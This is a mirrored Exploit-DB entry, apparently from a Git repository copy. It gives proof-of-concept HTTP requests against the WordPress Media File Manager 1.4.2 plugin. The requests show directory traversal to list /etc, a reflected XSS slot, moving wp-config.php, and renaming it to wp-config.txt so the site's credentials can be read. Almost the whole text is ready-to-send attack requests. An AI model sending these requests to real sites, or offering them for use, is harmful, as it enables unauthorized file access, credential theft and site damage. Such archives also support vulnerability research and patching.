bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45809.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

85 lines
No EOL
2.8 KiB
Text
Raw Blame History

# Exploit Title: Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
# Date: 2018-05-11
# Exploit Author: Pasquale Turi (aka boombyte)
# Vendor Homepage: https://wordpress.org/plugins/media-file-manager/
# Software Link: https://wordpress.org/plugins/media-file-manager/
# Version: 1.4.2
# CVE: N/A
# Tested on: Ubuntu 18.10
# Plugin description:
# This plugin can be used for manage the uploaded file (we can rename files, see a preview,
# delete and move them to other folders under wordpress upload folder).
# This plugin can be used by administrator, author, contributor and subscriber.
# POC
# Diretory trasversal:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDATED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=../../../../../../../etc
# POC
# XSS Reflected
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=[XSS]
# POC
# Move any file to any dir:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED
action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php
# POC
# Rename any file:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED
action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt
Reference in a new issue View git blame Copy permalink